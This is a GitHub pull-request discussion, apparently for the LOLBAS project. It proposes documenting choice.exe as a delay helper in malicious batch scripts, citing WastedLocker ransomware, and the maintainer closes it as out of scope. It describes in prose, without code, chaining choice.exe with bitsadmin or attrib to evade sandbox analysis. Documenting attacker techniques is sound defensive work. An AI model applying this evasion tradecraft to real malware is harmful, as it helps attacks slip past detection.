Skip to content

Create Choice.exe #483

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Closed
4renSick wants to merge 1 commit into from
Closed

Create Choice.exe #483

4renSick wants to merge 1 commit into from

Conversation

@4renSick
Copy link

@4renSick 4renSick commented Dec 20, 2025

This PR documents choice.exe as a helper binary that can be abused for execution
flow and timing control in malicious batch scripts.

While choice.exe does not execute payloads directly, it has been observed in
real-world ransomware activity (e.g., WastedLocker) as part of command chains
used to introduce silent delays before file manipulation or cleanup actions.

The included examples demonstrate how attackers can combine choice.exe with
other trusted Windows utilities (such as bitsadmin or attrib) to evade sandbox
analysis and reduce behavioral noise.

Reference:
SentinelOne – WastedLocker ransomware abusing NTFS file attributes

@4renSick 4renSick requested a review from a team as a code owner December 20, 2025 11:38
@4renSick 4renSick changed the title Choice.exe Create Choice.exe Dec 20, 2025
@4renSick
Copy link
Author

4renSick commented Dec 20, 2025

Thanks for reviewing.
This entry documents choice.exe as a helper binary used for execution flow
and timing control, with a real-world reference from SentinelOne’s
WastedLocker analysis. Happy to update or adjust if needed.

@wietze
Copy link
Member

wietze commented Jan 3, 2026

Hey @4renSick , thank you for your suggestion.

Having reviewed your submission, I believe that unfortunately it does not meet the criteria this project has set out. That doesn't mean the functionality you documented is not useful for e.g. red teamers, but if my assessment is right, this entry would unfortunately not be the right fit for this project. For that reason I'm closing this pull request now, if you think I'm wrong though please comment in here and I'll reopen the pull request.

@wietze wietze closed this Jan 3, 2026
@4renSick
Copy link
Author

4renSick commented Jan 3, 2026

Thank you @wietze for taking the time to review the submission and for the detailed feedback.
I understand your assessment regarding the scope and criteria of the project, and I agree that choice.exe primarily serves as a helper utility rather than enabling direct execution or payload retrieval on its own.
My intent with the submission was to document how attackers may abuse it as a control primitive in multi-stage batch-based tradecraft, but I appreciate that this does not align with the core inclusion requirements of LOLBAS.
I’m continuing my research in this area and hope that in the future I’ll be able to discover and contribute new binaries that better fit the project’s criteria.
Thanks again for the review and for maintaining the quality standards of the project.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

No reviews

Assignees

No one assigned

Labels

None yet

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

2 participants

@4renSick @wietze